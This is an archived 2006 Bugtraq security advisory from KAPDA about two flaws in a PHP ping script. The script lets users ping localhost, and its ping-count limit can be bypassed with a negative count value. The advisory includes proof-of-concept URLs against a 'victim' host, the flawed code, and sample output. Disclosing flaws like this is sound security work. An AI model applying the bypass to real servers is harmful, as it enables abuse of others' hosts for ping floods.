lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 23 Jan 2006 20:54:13 -0000
From: cvh@...da.ir
To: bugtraq@...urityfocus.com
Subject: The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns)


 [KAPDA::#23] - The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns)

KAPDA New advisory

Vulnerable products : The WorldsEnd.NET - Free Ping Script
Vendor: http://www.theworldsend.net/
Risk: Low
Vulnerabilities: Restriction Bypass

Date :
--------------------
Found : Aug 2005
Vendor Contacted : N/A
Release Date : Jan 2006

About The WorldsEnd.NET - Free Ping Script :
--------------------
A simple php script for sending pings to remote hosts.
This script has a bad reputation because of a previous remote command execution bug.

Vulnerability:
--------------------
Vuln 1: the script allows to ping the server it is hosted on. 127.0.0.1

Vuln 2: the scripts only allows you to send 10 or 4 pings

Just look at the count value in the url

http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21

Maximum for count is: 10

But because of a signed/unsigned integer overflow (script -> ping) and an extra programming error we can bypass that restriction.

Exploit:
--------------------

You can bypass the ping count restriction by just making the count value negative.

http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21
This will bypass the restriction and allows you to send any amount of pings.

Just look at this code snippet from the script

// over count ?
If ($count > $max_count) <== HERE IS THE MISTAKE, IT DOENS'NT CHECK FOR NEGATIVE NUMBERS
{
echo 'Maximum for count is: '.$max_count;
echo '<a href="'.$self.'">Back</a>';
}
else
{
// replace bad chars
$host= preg_replace ("/[^A-Za-z0-9.]/","",$host); <== HERE IS THE FIX FOR THE REMOTE CODE EXECUTION BUG
echo '<body bgcolor="#FFFFFF" text="#000000"></body>';
echo("Ping Output:<br>");
echo '<pre>';

Ping Output:

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:

Packets: Sent = 50, Received = 50, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

Solution:
--------------------
No patch or fix exits

Original Advisory:
--------------------
http://www.kapda.ir/advisory-231.html

Credit :
--------------------
Discoverd by cvh [at} kapda.ir
Grtz to all members of KAPDA and GSO.
KAPDA - Computer Security Researchers Institute
http://www.KAPDA.ir

Powered by blists - more mailing lists